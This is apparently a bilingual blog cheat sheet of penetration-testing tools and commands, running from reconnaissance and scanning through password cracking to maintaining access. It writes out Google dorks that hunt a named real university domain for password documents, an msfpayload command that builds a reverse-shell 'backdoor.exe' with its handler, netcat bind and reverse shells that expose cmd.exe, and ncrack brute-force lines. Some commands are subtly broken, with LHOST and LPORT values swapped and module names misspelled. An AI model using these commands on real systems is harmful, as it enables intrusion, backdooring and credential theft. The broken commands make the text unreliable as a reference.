Posted on 

network security toolkit

0x00 Objective

顺便借助主流工具,来介绍常规网络问题。

0x01 distributions:

  • kali:
    From the creators of BackTrack comes Kali Linux, the most advanced and versatile penetration testing distribution ever created. We have a whole set of amazing features lined up in our security distribution, geared at streamlining the penetration testing experience.
  • Backbox Linux:
    Another Ubuntu based distro but uses XFCE as its window manager and relies on its own repo to constantly keep its tools updated.
  • Pentoo:
    A livecd based on Gentoo and XFCE. Also available as an overlay for existing Gentoo installations. Has the ability to crack passwords using GPGPU out of the box.

0x02 recce

传统的本地 dns 探测工具,多数依赖于字典文件:

1
2
dnsenum.pl -f dns_list.txt --dnserver 8.8.8.8 cisco.com -o cisco.list
dnsmap cisco.com -w wordlist.txt -c cisco.csv

路由信息收集工具,一个传统的 udp 实现,一个现代一点的利用 tcp 实现,可以穿越防火墙。

  • paratrace, 一种新的、隐形的 traceroute, 可使用有状态的过滤器。
  • traceroute: 传统的工具
  • tcptraceroute:稍微新一点,利用 tcp 的工具。

搜索引擎的技巧

http://en.wikipedia.org/wiki/Google_hacking
filetype:xls site:jlxy.nju.edu.cn
密码 site:jlxy.nju.edu.cn
密码 site:jlxy.nju.edu.cn filetype:doc
site:jlxy.nju.edu.cn intext:admin

自动化,综合的信息收集平台 maltego

1:domain
2:dns
3:whois information
4:network block
5:ip address
6:E-mail

0x03 scanning

发现主机

1
2
3
4
5
6
7
8
9
10
arping -c 2 192.168.1.1

fping -s -r 1 192.168.1.1 192.168.1.254

hping3 -c 2 192.168.1.1

hping3
hping>hping send {ip(addr=192.168.1.1)+icmp(type=8,code=0)}

nbtscan 192.168.1.1-254

操作系统指纹识别

  • 主动:nmap -O
  • 被动:p0f

端口扫描

  • autoscan
  • netifera
  • scanrand: 一个非常快速、无状态的 TCP 端口扫描器和 traceroute 工具

服务探测

1
2
cd /pentest/enumeration/www/httprint/linux/
httprint -h 192.168.1.1 -s singnature.txt

VPN 探测

1
2
ike-scan -M -v 192.168.1.1
sslscan 192.168.1.1

0x04 Vulnerability discovery

Cisco tools

cisco auditing tool

1
# ./CAT -h 192.182.1.1 -w lists/community -a lists/passwords -I

Cisco passwd scanner

1
# ./cisco 10.10.10 3 -t 4 -C 10

Snmp tools

1
2
cd /pentest/enumeration/snmp/admsnmp
./ADMsnmp 192.168.1.1 -wordf wordlist.list

如果你知道 snmp 的 community, 你可以使用这个工具收集信息。

1
2
cd  /pentest/enumeration/snmp/snmpenum/
./snmpenum 192.168.1.1 private windows.txt

0x05 web toolkit

Burp suite

Nikto

1
# ./nikto.pl -h 192.168.1.1 -C -p 80 T3487b -t 3 -D \V  -o webtest -F htm

W3af

这个 waf 的探测工具:WAFW00F

1
2
cd /pentest/web/waffit/
./wafw00f http://....

介绍两个成熟的框架:openvas,nessus

0x06 Integrated tools

MSF

1
# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.150 LPORT=4444 X > backdoor.exe
1
2
3
4
5
msfconsole
use exploit/multi/hander
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 192.168.1.150
set LHOST 4444

0x07 local network

Layer 2:

  • CDP(cisco discovery protocols)
  • mac flood

Layer 3:

dhcp tcp syn flood

结合一点点嗅探技术:
包由 Dug Song 编写,已经发布几年了,是一组强大的网络审核工具。其中有一个简洁的小工具 arpspoof, 可用于向 ARP 缓存注入虚假信息。该工具可以创建 Gratuitous ARP 应答,应答数据包中的源 IP 是用户打算伪装的 IP 地址,而目标 IP 则是所要嗅探的目标计算机。

0x08 crack the password

online:以破解 cisco 的路由器,和 html 表单的例子。

1
2
ncrack -U pass -v -P pass telnet://192.168.1.1
ncrack -U pass -v -P pass http://192.168.1.1

offline:无线的密码破解是离线的

0x09 Maintaining Access

基本都是两台主机,其中一台替另一台通过某些服务对流量进行封装中继。

DNS 隧道

Server:dns2tcpd

1
./dns2tcpd -F -d 1 -f dns2tcpd.conf

Client:

1
./dns2tcpc  -z  domain.org
1
2
3
4
Domain=domain.org
Rescoure = ssh
Local_port = 2222
Debug = 1

icmp 隧道

Server:

1
./ptunnel

Client:

1
./ptunnel -p tun.ser_ip -lp 2222 -da ture.ip  -dp 22

代理服务器

netcat
Windows:

1
nc.exe -d -L -p 1234 -e cmd.exe

Remote:

1
nc -l -p 1234

locale:

1
nc -d remore port -e cmd.exe

Nc realy:(利用脚本实现),就是一种重定向,指定的数据流转发,还可以把传输的信息 dump 一次。

1
2
3
#!/bin/bash
nc -o output.file ip_addr port
nc -l -p 23 -e script.sh